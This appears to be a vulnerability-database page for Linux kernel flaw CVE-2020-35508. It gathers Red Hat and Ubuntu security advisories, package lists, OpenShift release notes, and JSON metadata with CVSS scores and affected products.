1783434 - CVE-2019-19523 kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver 1783507 - CVE-2019-19528 kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver 1831726 - CVE-2020-12464 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c 1833445 - CVE-2020-11608 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c 1848652 - CVE-2020-12114 kernel: DoS by corrupting mountpoint reference counter 1853922 - CVE-2020-14314 kernel: buffer uses out of index in ext3/4 filesystem 1868453 - CVE-2020-14356 kernel: Use After Free vulnerability in cgroup BPF component 1869141 - CVE-2020-24394 kernel: umask not applied on filesystem without ACL support 1877575 - CVE-2020-25212 kernel: TOCTOU mismatch in the NFS client code 1879981 - CVE-2020-25643 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow 1882591 - CVE-2020-25285 kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c 1882594 - CVE-2020-25284 kernel: incomplete permission checking for access to rbd devices 1886109 - BUG: using smp_processor_id() in preemptible [00000000] code: handler106/3082 [rhel-rt-8.4.0] 1894793 - After configure hugepage and reboot test server, kernel got panic status. 1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory 1896842 - host locks up when running stress-ng itimers on RT kernel. 1897869 - Running oslat in RT guest, guest kernel shows Call Trace: INFO: task kcompactd0:35 blocked for more than 600 seconds. 1900933 - CVE-2020-27786 kernel: use-after-free in kernel midi subsystem 1901161 - CVE-2020-15437 kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c 1901709 - CVE-2020-27835 kernel: child process is able to access parent mm through hfi dev file handle 1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting ->real_parent 1903126 - CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon 1915799 - CVE-2021-0342 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege 1919889 - CVE-2020-0431 kernel: possible out of bounds write in kbd_keycode of keyboard.c 1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers
- Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source: kernel-rt-4.18.0-305.rt7.72.el8.src.rpm
x86_64: kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
Red Hat Enterprise Linux Real Time (v. 8):
Source: kernel-rt-4.18.0-305.rt7.72.el8.src.rpm
x86_64: kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYKPwgNzjgjWX9erEAQiOVg//YfXIKUxc84y2aRexvrPHeTQvYkFMktq7 NEhNhHqEZbDUabM5+eKb5hoyG44PmXvQuK1njYjEbpTjQss92U8fekGJZAR9Zbsl WEfVcu/ix/UJOzQj/lp+dKhirBSE/33xgBmSsQI6JQc+xn1AoZC8bOeSqyr7J6Y7 t6I552Llhun9DDUGS8KYAM8PkrK3RGQybAS3S4atTdYd0qk42ZPF7/XqrbI7G4iq 0Oe+ZePj6lN1O7pHV0WYUD2yzLTCZZopmz5847BLBEbGLqPyxlShZ+MFGsWxCOHk tW8lw/nqVt/MNlOXI1tD6P6iFZ6JQYrRU5mGFlvsl3t9NQW60MxmcUNPgtVknXW5 BssBM/r6uLi0yFTTnDRZnv2MCs7fIzzqKXOHozrCvItswG6S8Qs72MaW2EQHAEen m7/fMKWTjt9CQudNCm/FwHLb8O9cYnOZwRiAINomo2B/Fi1b7WlquETSmjgQaQNr RxqtgiNQ98q92gnFgC8pCzxmiKRmHLFJEuxXYVq0O8Ch5i/eC8ExoO7Hqe6kYnJe ZaST6fAtb2bMDcPdborfSIUmuDcYdKFtcEfCuuFZIbBxnL2aJDMw0zen/rmDNQyV lwwXoKanoP5EjKKFMc/zkeHlOInMzeHa/0DIlA9h3kpro5eGN0uOPZvsrlryjC+J iJzkORGWplM\xfb/D -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - aarch64, noarch, ppc64le, s390x, x86_64
Bug Fix(es):
-
kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source tree (BZ#1968022)
Bug Fix(es):
-
RHEL8.2 Snapshot2 - tpm: ibmvtpm: Wait for buffer to be set before proceeding (BZ#1933986)
-
fnic crash from invalid request pointer (BZ#1961707)
-
[Azure][RHEL8.4] Two Patches Needed To Enable Azure Host Time-syncing in VMs (BZ#1963051)
-
RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. (BZ#1969338)
-
Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.13. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2021:2122
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html
This update fixes the following bug among others:
- Previously, resources for the ClusterOperator were being created early in the update process, which led to update failures when the ClusterOperator had no status condition while Operators were updating. This bug fix changes the timing of when these resources are created. As a result, updates can take place without errors. (BZ#1959238)
Security Fix(es):
- gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64
The image digest is sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-s390x
The image digest is sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le
The image digest is sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36
All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor
- Solution:
For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled" 1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go 1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list 1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits 1959238 - CVO creating cloud-controller-manager too early causing upgrade failures 1960103 - SR-IOV obliviously reboot the node 1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1962302 - packageserver clusteroperator does not set reason or message for Available condition 1962312 - Deployment considered unhealthy despite being available and at latest generation 1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1963115 - Test verify /run filesystem contents failing
- ========================================================================== Ubuntu Security Notice USN-4752-1 February 25, 2021
linux-oem-5.6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-oem-5.6: Linux kernel for OEM systems
Details:
Daniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered that legacy pairing and secure-connections pairing authentication in the Bluetooth protocol could allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. A physically proximate attacker could use this to impersonate a previously paired Bluetooth device. (CVE-2020-10135)
Jay Shin discovered that the ext4 file system implementation in the Linux kernel did not properly handle directory access with broken indexing, leading to an out-of-bounds read vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-14314)
It was discovered that the block layer implementation in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-15436)
It was discovered that the serial port driver in the Linux kernel did not properly initialize a pointer in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2020-15437)
Andy Nguyen discovered that the Bluetooth HCI event packet parser in the Linux kernel did not properly handle event advertisements of certain sizes, leading to a heap-based buffer overflow. A physically proximate remote attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-24490)
It was discovered that the NFS client implementation in the Linux kernel did not properly perform bounds checking before copying security labels in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25212)
It was discovered that the Rados block device (rbd) driver in the Linux kernel did not properly perform privilege checks for access to rbd devices in some situations. A local attacker could use this to map or unmap rbd block devices. (CVE-2020-25284)
It was discovered that the block layer subsystem in the Linux kernel did not properly handle zero-length requests. A local attacker could use this to cause a denial of service. (CVE-2020-25641)
It was discovered that the HDLC PPP implementation in the Linux kernel did not properly validate input in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25643)
Kiyin (尹亮) discovered that the perf subsystem in the Linux kernel did not properly deallocate memory in some situations. A privileged attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2020-25704)
It was discovered that the KVM hypervisor in the Linux kernel did not properly handle interrupts in certain situations. A local attacker in a guest VM could possibly use this to cause a denial of service (host system crash). (CVE-2020-27152)
It was discovered that the jfs file system implementation in the Linux kernel contained an out-of-bounds read vulnerability. A local attacker could use this to possibly cause a denial of service (system crash). (CVE-2020-27815)
It was discovered that an information leak existed in the syscall implementation in the Linux kernel on 32 bit systems. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2020-28588)
It was discovered that the framebuffer implementation in the Linux kernel did not properly perform range checks in certain situations. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to gain unintended write access to read-only memory pages. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2020-29369)
Jann Horn discovered that the romfs file system in the Linux kernel did not properly validate file system meta-data, leading to an out-of-bounds read. An attacker could use this to construct a malicious romfs image that, when mounted, exposed sensitive information (kernel memory). (CVE-2020-29371)
Jann Horn discovered that the tty subsystem of the Linux kernel did not use consistent locking in some situations, leading to a read-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information (kernel memory). (CVE-2020-29660)
Jann Horn discovered a race condition in the tty subsystem of the Linux kernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-35508)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS: linux-image-5.6.0-1048-oem 5.6.0-1048.52 linux-image-oem-20.04 5.6.0.1048.44
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://usn.ubuntu.com/4752-1 CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437, CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641, CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815, CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369, CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508
Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "a700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "h615c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "fas8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux",
"scope": null,
"trust": 0.8,
"vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
}
],
"trust": 1.1
},
"cve": "CVE-2020-35508",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "CVE-2020-35508",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "VHN-377704",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.0,
"id": "CVE-2020-35508",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 4.5,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-35508",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-35508",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-35508",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202102-1668",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-377704",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-35508",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"description": {
"_id": null,
"data": "A flaw possibility of race condition and incorrect initialization of the process id was found in the Linux kernel child/parent process identification handling while filtering signal handlers. A local attacker is able to abuse this flaw to bypass checks to send any signal to a privileged process. Linux Kernel Contains an initialization vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: kernel-rt security and bug fix update\nAdvisory ID: RHSA-2021:1739-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1739\nIssue date: 2021-05-18\nCVE Names: CVE-2019-19523 CVE-2019-19528 CVE-2020-0431\n CVE-2020-11608 CVE-2020-12114 CVE-2020-12362\n CVE-2020-12464 CVE-2020-14314 CVE-2020-14356\n CVE-2020-15437 CVE-2020-24394 CVE-2020-25212\n CVE-2020-25284 CVE-2020-25285 CVE-2020-25643\n CVE-2020-25704 CVE-2020-27786 CVE-2020-27835\n CVE-2020-28974 CVE-2020-35508 CVE-2021-0342\n====================================================================\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time (v. 8) - x86_64\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)\n\n* kernel: use-after-free caused by a malicious USB device in the\ndrivers/usb/misc/adutux.c driver (CVE-2019-19523)\n\n* kernel: use-after-free bug caused by a malicious USB device in the\ndrivers/usb/misc/iowarrior.c driver (CVE-2019-19528)\n\n* kernel: possible out of bounds write in kbd_keycode of keyboard.c\n(CVE-2020-0431)\n\n* kernel: DoS by corrupting mountpoint reference counter (CVE-2020-12114)\n\n* kernel: use-after-free in usb_sg_cancel function in\ndrivers/usb/core/message.c (CVE-2020-12464)\n\n* kernel: buffer uses out of index in ext3/4 filesystem (CVE-2020-14314)\n\n* kernel: Use After Free vulnerability in cgroup BPF component\n(CVE-2020-14356)\n\n* kernel: NULL pointer dereference in serial8250_isa_init_ports function in\ndrivers/tty/serial/8250/8250_core.c (CVE-2020-15437)\n\n* kernel: umask not applied on filesystem without ACL support\n(CVE-2020-24394)\n\n* kernel: TOCTOU mismatch in the NFS client code (CVE-2020-25212)\n\n* kernel: incomplete permission checking for access to rbd devices\n(CVE-2020-25284)\n\n* kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c\n(CVE-2020-25285)\n\n* kernel: improper input validation in ppp_cp_parse_cr function leads to\nmemory corruption and read overflow (CVE-2020-25643)\n\n* kernel: perf_event_parse_addr_filter memory (CVE-2020-25704)\n\n* kernel: use-after-free in kernel midi subsystem (CVE-2020-27786)\n\n* kernel: child process is able to access parent mm through hfi dev file\nhandle (CVE-2020-27835)\n\n* kernel: slab-out-of-bounds read in fbcon (CVE-2020-28974)\n\n* kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting\n- -\u003ereal_parent (CVE-2020-35508)\n\n* kernel: use after free in tun_get_user of tun.c could lead to local\nescalation of privilege (CVE-2021-0342)\n\n* kernel: NULL pointer dereferences in ov511_mode_init_regs and\nov518_mode_init_regs in drivers/media/usb/gspca/ov519.c (CVE-2020-11608)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.4 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1783434 - CVE-2019-19523 kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver\n1783507 - CVE-2019-19528 kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver\n1831726 - CVE-2020-12464 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c\n1833445 - CVE-2020-11608 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c\n1848652 - CVE-2020-12114 kernel: DoS by corrupting mountpoint reference counter\n1853922 - CVE-2020-14314 kernel: buffer uses out of index in ext3/4 filesystem\n1868453 - CVE-2020-14356 kernel: Use After Free vulnerability in cgroup BPF component\n1869141 - CVE-2020-24394 kernel: umask not applied on filesystem without ACL support\n1877575 - CVE-2020-25212 kernel: TOCTOU mismatch in the NFS client code\n1879981 - CVE-2020-25643 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow\n1882591 - CVE-2020-25285 kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c\n1882594 - CVE-2020-25284 kernel: incomplete permission checking for access to rbd devices\n1886109 - BUG: using smp_processor_id() in preemptible [00000000] code: handler106/3082 [rhel-rt-8.4.0]\n1894793 - After configure hugepage and reboot test server, kernel got panic status. \n1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory\n1896842 - host locks up when running stress-ng itimers on RT kernel. \n1897869 - Running oslat in RT guest, guest kernel shows Call Trace: INFO: task kcompactd0:35 blocked for more than 600 seconds. \n1900933 - CVE-2020-27786 kernel: use-after-free in kernel midi subsystem\n1901161 - CVE-2020-15437 kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c\n1901709 - CVE-2020-27835 kernel: child process is able to access parent mm through hfi dev file handle\n1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting -\u003ereal_parent\n1903126 - CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon\n1915799 - CVE-2021-0342 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege\n1919889 - CVE-2020-0431 kernel: possible out of bounds write in kbd_keycode of keyboard.c\n1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-305.rt7.72.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\n\nRed Hat Enterprise Linux Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-305.rt7.72.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 